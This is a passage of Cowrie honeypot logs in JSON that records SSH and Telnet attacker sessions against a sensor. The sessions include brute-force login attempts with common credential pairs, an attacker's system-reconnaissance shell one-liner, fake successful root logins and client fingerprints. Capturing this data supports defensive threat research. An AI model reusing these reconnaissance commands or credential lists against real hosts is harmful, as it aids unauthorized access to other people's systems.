-c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T08:47:07.245439Z","src_ip":"212.227.125.160","session":"e4ad11ad77a7"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:47:07.245939Z","src_ip":"212.227.125.160","session":"e4ad11ad77a7"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:47:07.247126Z","src_ip":"212.227.125.160","session":"e4ad11ad77a7"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T08:47:07.248593Z","src_ip":"212.227.125.160","session":"e4ad11ad77a7"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:47:07.249257Z","src_ip":"212.227.125.160","session":"e4ad11ad77a7"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T08:47:07.249947Z","src_ip":"212.227.125.160","session":"e4ad11ad77a7"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T08:47:07.251143Z","src_ip":"212.227.125.160","session":"e4ad11ad77a7"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T08:47:07.251861Z","src_ip":"212.227.125.160","session":"e4ad11ad77a7"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:47:07.252396Z","src_ip":"212.227.125.160","session":"e4ad11ad77a7"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T08:47:07.252932Z","src_ip":"212.227.125.160","session":"e4ad11ad77a7"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:47:07.253506Z","src_ip":"212.227.125.160","session":"e4ad11ad77a7"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T08:47:07.254083Z","src_ip":"212.227.125.160","session":"e4ad11ad77a7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T08:47:08.879376Z","src_ip":"212.227.125.160","session":"e4ad11ad77a7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:47:08.880363Z","src_ip":"212.227.125.160","session":"e4ad11ad77a7"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:47:08.881534Z","src_ip":"212.227.125.160","session":"e4ad11ad77a7"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":37942,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d3748185c67","protocol":"ssh","message":"New connection: 51.79.164.132:37942 (1.2.3.4:22) [session: 5d3748185c67]","sensor":"my-vps","timestamp":"2025-08-28T08:47:14.225037Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:47:14.439386Z","src_ip":"51.79.164.132","session":"5d3748185c67"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:47:14.440056Z","src_ip":"51.79.164.132","session":"5d3748185c67"}
{"eventid":"cowrie.login.success","username":"root","password":"Pa$$w0rd","message":"login attempt [root/Pa$$w0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:47:16.165136Z","src_ip":"51.79.164.132","session":"5d3748185c67"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:47:16.882143Z","src_ip":"51.79.164.132","session":"5d3748185c67"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T08:47:16.882968Z","src_ip":"51.79.164.132","session":"5d3748185c67"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:47:17.500964Z","src_ip":"51.79.164.132","session":"5d3748185c67"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:47:17.502171Z","src_ip":"51.79.164.132","session":"5d3748185c67"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59306,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3cbd7f62c27","protocol":"ssh","message":"New connection: 212.227.125.160:59306 (1.2.3.4:22) [session: e3cbd7f62c27]","sensor":"my-vps","timestamp":"2025-08-28T08:47:22.246767Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T08:47:22.247672Z","src_ip":"212.227.125.160","session":"e3cbd7f62c27"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T08:47:22.307943Z","src_ip":"212.227.125.160","session":"e3cbd7f62c27"}
{"eventid":"cowrie.login.failed","username":"admin","password":"badbad","message":"login attempt [admin/badbad] failed","sensor":"my-vps","timestamp":"2025-08-28T08:47:22.629879Z","src_ip":"212.227.125.160","session":"e3cbd7f62c27"}
{"eventid":"cowrie.login.failed","username":"admin","password":"arrakis","message":"login attempt [admin/arrakis] failed","sensor":"my-vps","timestamp":"2025-08-28T08:47:23.691782Z","src_ip":"212.227.125.160","session":"e3cbd7f62c27"}
{"eventid":"cowrie.login.failed","username":"admin","password":"armstrong","message":"login attempt [admin/armstrong] failed","sensor":"my-vps","timestamp":"2025-08-28T08:47:24.754765Z","src_ip":"212.227.125.160","session":"e3cbd7f62c27"}
{"eventid":"cowrie.login.failed","username":"admin","password":"arman","message":"login attempt [admin/arman] failed","sensor":"my-vps","timestamp":"2025-08-28T08:47:25.816850Z","src_ip":"212.227.125.160","session":"e3cbd7f62c27"}
{"eventid":"cowrie.login.failed","username":"admin","password":"arielle","message":"login attempt [admin/arielle] failed","sensor":"my-vps","timestamp":"2025-08-28T08:47:26.878768Z","src_ip":"212.227.125.160","session":"e3cbd7f62c27"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:47:27.941868Z","src_ip":"212.227.125.160","session":"e3cbd7f62c27"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63592,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8ec6379a0d1","protocol":"ssh","message":"New connection: 212.227.125.160:63592 (1.2.3.4:22) [session: e8ec6379a0d1]","sensor":"my-vps","timestamp":"2025-08-28T08:47:35.846027Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T08:47:35.846945Z","src_ip":"212.227.125.160","session":"e8ec6379a0d1"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T08:47:35.958967Z","src_ip":"212.227.125.160","session":"e8ec6379a0d1"}
{"eventid":"cowrie.login.failed","username":"tate","password":"tate","message":"login attempt [tate/tate] failed","sensor":"my-vps","timestamp":"2025-08-28T08:47:36.452433Z","src_ip":"212.227.125.160","session":"e8ec6379a0d1"}
{"eventid":"cowrie.login.failed","username":"tate","password":"tate1","message":"login attempt [tate/tate1] failed","sensor":"my-vps","timestamp":"2025-08-28T08:47:37.567391Z","src_ip":"212.227.125.160","session":"e8ec6379a0d1"}
{"eventid":"cowrie.login.failed","username":"tate","password":"tate123","message":"login attempt [tate/tate123] failed","sensor":"my-vps","timestamp":"2025-08-28T08:47:38.782941Z","src_ip":"212.227.125.160","session":"e8ec6379a0d1"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":57100,"dst_ip":"1.2.3.4","dst_port":22,"session":"377ffa6c0fcc","protocol":"ssh","message":"New connection: 185.93.89.7:57100 (1.2.3.4:22) [session: 377ffa6c0fcc]","sensor":"my-vps","timestamp":"2025-08-28T08:47:38.819381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:47:38.873129Z","src_ip":"185.93.89.7","session":"377ffa6c0fcc"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:47:38.873909Z","src_ip":"185.93.89.7","session":"377ffa6c0fcc"}
{"eventid":"cowrie.login.success","username":"root","password":"index2022!","message":"login attempt [root/index2022!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:47:38.951262Z","src_ip":"185.93.89.7","session":"377ffa6c0fcc"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:47:38.971514Z","src_ip":"185.93.89.7","session":"377ffa6c0fcc"}
{"eventid":"cowrie.login.failed","username":"tate","password":"tate1234","message":"login attempt [tate/tate1234] failed","sensor":"my-vps","timestamp":"2025-08-28T08:47:39.898845Z","src_ip":"212.227.125.160","session":"e8ec6379a0d1"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":44044,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f0c855e1aae","protocol":"ssh","message":"New connection: 51.79.164.132:44044 (1.2.3.4:22) [session: 8f0c855e1aae]","sensor":"my-vps","timestamp":"2025-08-28T08:47:40.167796Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:47:40.248529Z","src_ip":"51.79.164.132","session":"8f0c855e1aae"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:47:40.546460Z","src_ip":"51.79.164.132","session":"8f0c855e1aae"}
{"eventid":"cowrie.login.failed","username":"tate","password":"tate12345","message":"login attempt [tate/tate12345] failed","sensor":"my-vps","timestamp":"2025-08-28T08:47:41.012136Z","src_ip":"212.227.125.160","session":"e8ec6379a0d1"}
{"eventid":"cowrie.login.failed","username":"git","password":"123456","message":"login attempt [git/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T08:47:41.943901Z","src_ip":"51.79.164.132","session":"8f0c855e1aae"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:47:42.471411Z","src_ip":"212.227.125.160","session":"e8ec6379a0d1"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:47:43.743999Z","src_ip":"51.79.164.132","session":"8f0c855e1aae"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":50704,"dst_ip":"1.2.3.4","dst_port":22,"session":"2700cd2ec9f2","protocol":"ssh","message":"New connection: 185.93.89.7:50704 (1.2.3.4:22) [session: 2700cd2ec9f2]","sensor":"my-vps","timestamp":"2025-08-28T08:47:48.027897Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:47:48.029056Z","src_ip":"185.93.89.7","session":"2700cd2ec9f2"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:47:48.047302Z","src_ip":"185.93.89.7","session":"2700cd2ec9f2"}
{"eventid":"cowrie.login.success","username":"root","password":"Index2022!","message":"login attempt [root/Index2022!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:47:48.085806Z","src_ip":"185.93.89.7","session":"2700cd2ec9f2"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:47:48.104723Z","src_ip":"185.93.89.7","session":"2700cd2ec9f2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52592,"dst_ip":"1.2.3.4","dst_port":23,"session":"b7d8ed4701b7","protocol":"telnet","message":"New connection: 212.227.125.160:52592 (1.2.3.4:23) [session: b7d8ed4701b7]","sensor":"my-vps","timestamp":"2025-08-28T08:47:57.762089Z"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":47662,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a60fa2527c7","protocol":"ssh","message":"New connection: 51.79.164.132:47662 (1.2.3.4:22) [session: 3a60fa2527c7]","sensor":"my-vps","timestamp":"2025-08-28T08:48:06.623465Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:48:06.864600Z","src_ip":"51.79.164.132","session":"3a60fa2527c7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:48:06.865458Z","src_ip":"51.79.164.132","session":"3a60fa2527c7"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123","message":"login attempt [postgres/123] failed","sensor":"my-vps","timestamp":"2025-08-28T08:48:08.939867Z","src_ip":"51.79.164.132","session":"3a60fa2527c7"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:48:10.434726Z","src_ip":"51.79.164.132","session":"3a60fa2527c7"}
